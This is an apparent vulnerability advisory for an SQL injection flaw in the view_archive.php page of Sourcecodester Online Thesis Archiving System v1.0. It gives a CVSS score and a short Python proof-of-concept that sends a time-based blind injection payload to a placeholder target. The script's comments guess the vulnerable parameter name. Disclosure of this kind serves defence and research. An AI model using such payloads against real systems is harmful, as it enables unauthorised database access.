Sourcecodester Online Thesis Archiving System v1.0 is vulnerale to SQL injection in the file /otas/view_archive.php.
CVSS Details
CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Configurations (Affected Products)
No configuration data available.
Sourcecodester Online Thesis Archiving System v1.0
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
# Target URL (Replace with actual target)
target_url = "http://target.com/otas/view_archive.php"
# Malicious payload to test SQL Injection
# Assuming the parameter is 'id', this payload attempts a time-based blind injection
payload = "?id=1' AND (SELECT SLEEP(5))-- -"
try:
# Send the request
response = requests.get(target_url + payload)
# Check if the response time indicates a delay (vulnerability confirmed)
if response.elapsed.total_seconds() >= 5:
print("[+] Vulnerability confirmed: SQL Injection exists in view_archive.php")
else:
print("[-] Vulnerability not detected or payload incorrect.")
except Exception as e:
print(f"Error: {e}")